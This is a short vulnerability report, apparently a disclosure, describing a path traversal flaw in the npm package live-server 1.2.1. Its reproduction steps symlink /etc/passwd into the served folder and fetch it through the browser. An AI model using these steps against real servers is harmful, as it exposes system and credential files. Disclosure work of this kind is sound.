I would like to report path traversal vulnerability in live-server module It allows an attacker to read system files via path traversal vulnerability. This is a little development server with live reload capability.
module name: live-server version: 1.2.1 npm page: https://www.npmjs.com/package/live-server
1)Install the live-server module $ npm install -g live-server
2)Make a directory $ mkdir test
3)Go to 'test' directory $ cd test
4)create a symlink file ln -s /etc/passwd 'filename'
5)Run live-server module $ live-server
6)Request the file within browser http://localhost:3474/'filename'
This could have enabled an attacker to view system files and leverage attacks like remote code execution and so on